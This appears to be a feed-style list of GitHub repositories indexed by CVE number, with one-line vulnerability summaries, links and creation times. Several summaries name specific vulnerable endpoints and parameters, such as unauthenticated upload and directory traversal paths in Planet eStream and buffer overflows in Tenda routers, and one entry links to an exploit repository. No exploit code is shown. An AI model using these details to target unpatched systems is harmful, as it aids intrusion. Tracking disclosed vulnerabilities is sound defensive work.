**An image signature validation bypass vulnerability in Kyverno 1.8.3 and 1.8.4 allows a malicious image registry (or a man-in-the-middle attacker) to inject unsigned arbitrary container images into a protected Kubernetes cluster. This is fixed in 1.8.5. This has been fixed in 1.8.5 and mitigations are available for impa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47633](https://github.com/Live-Hack-CVE/CVE-2022-47633) create time: 2022-12-27T09:17:15Z

**Cross Site Scripting (XSS) vulnerability in typora through 1.38 allows remote attackers to run arbitrary code via export from editor. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40011](https://github.com/Live-Hack-CVE/CVE-2022-40011) create time: 2022-12-27T09:17:12Z

**JSON5 is an extension to the popular JSON file format that aims to be easier to write and maintain by hand (e.g. for config files). The `parse` method of the JSON5 library before and including version `2.2.1` does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototyp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46175](https://github.com/Live-Hack-CVE/CVE-2022-46175) create time: 2022-12-27T09:17:08Z

**Brave Browser before 1.43.88 allowed a remote attacker to cause a denial of service in private and guest windows via a crafted HTML file that mentions an ipfs:// or ipns:// URL. This is caused by an incomplete fix for CVE-2022-47932 and CVE-2022-47934. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47934](https://github.com/Live-Hack-CVE/CVE-2022-47934) create time: 2022-12-27T09:17:05Z

**Brave Browser before 1.42.51 allowed a remote attacker to cause a denial of service via a crafted HTML file that references the IPFS scheme. This vulnerability is caused by an uncaught exception in the function ipfs::OnBeforeURLRequest_IPFSRedirectWork() in ipfs_redirect_network_delegate_helper.cc. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47933](https://github.com/Live-Hack-CVE/CVE-2022-47933) create time: 2022-12-27T09:17:02Z

**Brave Browser before 1.43.34 allowed a remote attacker to cause a denial of service via a crafted HTML file that mentions an ipfs:// or ipns:// URL. This vulnerability is caused by an incomplete fix for CVE-2022-47933. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47932](https://github.com/Live-Hack-CVE/CVE-2022-47932) create time: 2022-12-27T09:16:41Z

**The Nintendo NetworkBuffer class, as used in Animal Crossing: New Horizons before 2.0.6 and other products, allows remote attackers to execute arbitrary code via a large UDP packet that causes a buffer overflow, aka ENLBufferPwn. The victim must join a game session with the attacker. Other affected products include Mar CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47949](https://github.com/Live-Hack-CVE/CVE-2022-47949) create time: 2022-12-27T09:16:38Z

**Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the ssid parameter at /goform/fast_setting_wifi_set. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46541](https://github.com/Live-Hack-CVE/CVE-2022-46541) create time: 2022-12-27T09:16:34Z

**Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the page parameter at /goform/addressNat. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46542](https://github.com/Live-Hack-CVE/CVE-2022-46542) create time: 2022-12-27T09:16:31Z

**Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the entrys parameter at /goform/addressNat. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46540](https://github.com/Live-Hack-CVE/CVE-2022-46540) create time: 2022-12-27T09:16:27Z

**Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the mitInterface parameter at /goform/addressNat. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46543](https://github.com/Live-Hack-CVE/CVE-2022-46543) create time: 2022-12-27T09:16:23Z

**Deark v.1.6.2 was discovered to contain a stack overflow via the do_prism_read_palette() function at /modules/atari-img.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43289](https://github.com/Live-Hack-CVE/CVE-2022-43289) create time: 2022-12-27T09:16:20Z

**An issue was discovered in the Linux kernel through 6.0.10. l2cap_config_req in net/bluetooth/l2cap_core.c has an integer wraparound via L2CAP_CONF_REQ packets. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45934](https://github.com/Live-Hack-CVE/CVE-2022-45934) create time: 2022-12-27T09:16:16Z

**In Planet eStream before 6.72.10.07, multiple Stored Cross-Site Scripting (XSS) vulnerabilities exist: Disclaimer, Search Function, Comments, Batch editing tool, Content Creation, Related Media, Create new user, and Change Username. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45892](https://github.com/Live-Hack-CVE/CVE-2022-45892) create time: 2022-12-27T09:16:12Z

**Planet eStream before 6.72.10.07 allows attackers to call restricted functions, and perform unauthenticated uploads (Upload2.ashx) or access content uploaded by other users (View.aspx after Ajax.asmx/SaveGrantAccessList). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45891](https://github.com/Live-Hack-CVE/CVE-2022-45891) create time: 2022-12-27T09:16:04Z

**In Planet eStream before 6.72.10.07, a Reflected Cross-Site Scripting (XSS) vulnerability exists via any metadata filter field (e.g., search within Default.aspx with the r or fo parameter). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45890](https://github.com/Live-Hack-CVE/CVE-2022-45890) create time: 2022-12-27T09:16:00Z

**Planet eStream before 6.72.10.07 allows a remote attacker (who is a publisher or admin) to obtain access to all records stored in the database, and achieve the ability to execute arbitrary SQL commands, via Search (the StatisticsResults.aspx flt parameter). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45889](https://github.com/Live-Hack-CVE/CVE-2022-45889) create time: 2022-12-27T09:15:57Z

**Planet eStream before 6.72.10.07 allows unauthenticated upload of arbitrary files: Choose a Video / Related Media or Upload Document. Upload2.ashx can be used, or Ajax.asmx/ProcessUpload2. This leads to remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45896](https://github.com/Live-Hack-CVE/CVE-2022-45896) create time: 2022-12-27T09:15:53Z

**Planet eStream before 6.72.10.07 discloses sensitive information, related to the ON cookie (findable in HTML source code for Default.aspx in some situations) and the WhoAmI endpoint (e.g., path disclosure). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45895](https://github.com/Live-Hack-CVE/CVE-2022-45895) create time: 2022-12-27T09:15:50Z

**GetFile.aspx in Planet eStream before 6.72.10.07 allows ..\ directory traversal to read arbitrary local files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45894](https://github.com/Live-Hack-CVE/CVE-2022-45894) create time: 2022-12-27T09:15:47Z

**Planet eStream before 6.72.10.07 allows a low-privileged user to gain access to administrative and high-privileged user accounts by changing the value of the ON cookie. A brute-force attack can calculate a value that provides permanent access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45893](https://github.com/Live-Hack-CVE/CVE-2022-45893) create time: 2022-12-27T09:15:43Z

**Slixmpp before 1.8.3 lacks SSL Certificate hostname validation in XMLStream, allowing an attacker to pose as any server in the eyes of Slixmpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45197](https://github.com/Live-Hack-CVE/CVE-2022-45197) create time: 2022-12-27T09:15:28Z

**Heimdal before 7.7.1 allows remote attackers to execute arbitrary code because of an invalid free in the ASN.1 codec used by the Key Distribution Center (KDC). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44640](https://github.com/Live-Hack-CVE/CVE-2022-44640) create time: 2022-12-27T09:15:25Z

**A SQL injection issue in a database stored function in TrueConf Server 5.2.0.10225 allows a low-privileged database user to execute arbitrary SQL commands as the database administrator, resulting in execution of arbitrary code. By @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46763](https://github.com/Live-Hack-CVE/CVE-2022-46763) create time: 2022-12-27T08:11:44Z

**no description** : [ohnonoyesyes/CVE-2022-43571](https://github.com/ohnonoyesyes/CVE-2022-43571) create time: 2022-12-27T08:00:44Z

**Exploit i used in HTB** : [bdunlap9/CVE-2007-2447_python](https://github.com/bdunlap9/CVE-2007-2447_python) create time: 2022-12-27T05:18:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2003-0836 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2003-0836](https://github.com/Live-Hack-CVE/CVE-2003-0836) create time: 2022-12-26T17:37:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-3870 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-3870](https://github.com/Live-Hack-CVE/CVE-2010-3870) create time: 2022-12-26T17:45:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-2089 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-2089](https://github.com/Live-Hack-CVE/CVE-2010-2089) create time: 2022-12-26T17:45:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-0831 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-0831](https://github.com/Live-Hack-CVE/CVE-2012-0831) create time: 2022-12-26T17:45:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-4113 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-4113](https://github.com/Live-Hack-CVE/CVE-2013-4113) create time: 2022-12-26T17:45:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-2882 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-2882](https://github.com/Live-Hack-CVE/CVE-2013-2882) create time: 2022-12-26T17:45:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-6668 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-6668](https://github.com/Live-Hack-CVE/CVE-2013-6668) create time: 2022-12-26T17:45:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0224 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0224](https://github.com/Live-Hack-CVE/CVE-2014-0224) create time: 2022-12-26T17:45:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0185 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0185](https://github.com/Live-Hack-CVE/CVE-2014-0185) create time: 2022-12-26T17:45:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-8389 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-8389](https://github.com/Live-Hack-CVE/CVE-2015-8389) create time: 2022-12-26T17:47:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-8994 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-8994](https://github.com/Live-Hack-CVE/CVE-2015-8994) create time: 2022-12-26T17:46:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-6764 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-6764](https://github.com/Live-Hack-CVE/CVE-2015-6764) create time: 2022-12-26T17:46:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-8394 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-8394](https://github.com/Live-Hack-CVE/CVE-2015-8394) create time: 2022-12-26T17:46:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-8390 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-8390](https://github.com/Live-Hack-CVE/CVE-2015-8390) create time: 2022-12-26T17:46:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-2301 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-2301](https://github.com/Live-Hack-CVE/CVE-2015-2301) create time: 2022-12-26T17:46:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-3416 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-3416](https://github.com/Live-Hack-CVE/CVE-2015-3416) create time: 2022-12-26T17:46:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-2305 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-2305](https://github.com/Live-Hack-CVE/CVE-2015-2305) create time: 2022-12-26T17:45:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0278 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0278](https://github.com/Live-Hack-CVE/CVE-2015-0278) create time: 2022-12-26T17:45:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-8387 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-8387](https://github.com/Live-Hack-CVE/CVE-2015-8387) create time: 2022-12-26T17:45:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-8383 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-8383](https://github.com/Live-Hack-CVE/CVE-2015-8383) create time: 2022-12-26T17:45:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-8386 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-8386](https://github.com/Live-Hack-CVE/CVE-2015-8386) create time: 2022-12-26T17:45:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-3414 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-3414](https://github.com/Live-Hack-CVE/CVE-2015-3414) create time: 2022-12-26T17:45:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-3415 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-3415](https://github.com/Live-Hack-CVE/CVE-2015-3415) create time: 2022-12-26T17:44:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-9843 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-9843](https://github.com/Live-Hack-CVE/CVE-2016-9843) create time: 2022-12-26T17:47:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-9841 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-9841](https://github.com/Live-Hack-CVE/CVE-2016-9841) create time: 2022-12-26T17:47:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-9842 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-9842](https://github.com/Live-Hack-CVE/CVE-2016-9842) create time: 2022-12-26T17:47:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-9840 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-9840](https://github.com/Live-Hack-CVE/CVE-2016-9840) create time: 2022-12-26T17:47:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5399 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5399](https://github.com/Live-Hack-CVE/CVE-2016-5399) create time: 2022-12-26T17:47:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-3189 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-3189](https://github.com/Live-Hack-CVE/CVE-2016-3189) create time: 2022-12-26T17:46:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5180 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5180](https://github.com/Live-Hack-CVE/CVE-2016-5180) create time: 2022-12-26T17:46:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5386 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5386](https://github.com/Live-Hack-CVE/CVE-2016-5386) create time: 2022-12-26T17:46:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7052 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7052](https://github.com/Live-Hack-CVE/CVE-2016-7052) create time: 2022-12-26T17:46:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-1669 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-1669](https://github.com/Live-Hack-CVE/CVE-2016-1669) create time: 2022-12-26T17:46:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-3958 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-3958](https://github.com/Live-Hack-CVE/CVE-2016-3958) create time: 2022-12-26T17:46:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-1000098 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-1000098](https://github.com/Live-Hack-CVE/CVE-2017-1000098) create time: 2022-12-26T17:47:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-1000381 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-1000381](https://github.com/Live-Hack-CVE/CVE-2017-1000381) create time: 2022-12-26T17:47:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-1000097 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-1000097](https://github.com/Live-Hack-CVE/CVE-2017-1000097) create time: 2022-12-26T17:47:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-15896 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-15896](https://github.com/Live-Hack-CVE/CVE-2017-15896) create time: 2022-12-26T17:47:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14746 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14746](https://github.com/Live-Hack-CVE/CVE-2017-14746) create time: 2022-12-26T17:47:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-7494 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-7494](https://github.com/Live-Hack-CVE/CVE-2017-7494) create time: 2022-12-26T17:47:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3731 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3731](https://github.com/Live-Hack-CVE/CVE-2017-3731) create time: 2022-12-26T17:47:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-0732 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-0732](https://github.com/Live-Hack-CVE/CVE-2018-0732) create time: 2022-12-26T17:48:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-7162 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-7162](https://github.com/Live-Hack-CVE/CVE-2018-7162) create time: 2022-12-26T17:48:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-7161 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-7161](https://github.com/Live-Hack-CVE/CVE-2018-7161) create time: 2022-12-26T17:47:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-1000168 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-1000168](https://github.com/Live-Hack-CVE/CVE-2018-1000168) create time: 2022-12-26T17:47:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-7160 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-7160](https://github.com/Live-Hack-CVE/CVE-2018-7160) create time: 2022-12-26T17:47:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-7187 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-7187](https://github.com/Live-Hack-CVE/CVE-2018-7187) create time: 2022-12-26T17:47:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-12257 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-12257](https://github.com/Live-Hack-CVE/CVE-2019-12257) create time: 2022-12-26T17:48:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-12256 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-12256](https://github.com/Live-Hack-CVE/CVE-2019-12256) create time: 2022-12-26T17:48:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9634 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9634](https://github.com/Live-Hack-CVE/CVE-2019-9634) create time: 2022-12-26T17:48:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9740 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9740](https://github.com/Live-Hack-CVE/CVE-2019-9740) create time: 2022-12-26T17:48:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9947 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9947](https://github.com/Live-Hack-CVE/CVE-2019-9947) create time: 2022-12-26T17:48:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2510 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2510](https://github.com/Live-Hack-CVE/CVE-2019-2510) create time: 2022-12-26T17:44:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23622 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23622](https://github.com/Live-Hack-CVE/CVE-2020-23622) create time: 2022-12-26T17:39:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21642 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21642](https://github.com/Live-Hack-CVE/CVE-2020-21642) create time: 2022-12-26T17:39:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21641 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21641](https://github.com/Live-Hack-CVE/CVE-2020-21641) create time: 2022-12-26T17:39:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44720 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44720](https://github.com/Live-Hack-CVE/CVE-2021-44720) create time: 2022-12-26T17:37:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20285 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20285](https://github.com/Live-Hack-CVE/CVE-2022-20285) create time: 2022-12-26T17:47:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20284 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20284](https://github.com/Live-Hack-CVE/CVE-2022-20284) create time: 2022-12-26T17:44:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20286 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20286](https://github.com/Live-Hack-CVE/CVE-2022-20286) create time: 2022-12-26T17:44:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20287 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20287](https://github.com/Live-Hack-CVE/CVE-2022-20287) create time: 2022-12-26T17:44:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35668 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35668](https://github.com/Live-Hack-CVE/CVE-2022-35668) create time: 2022-12-26T17:44:31Z

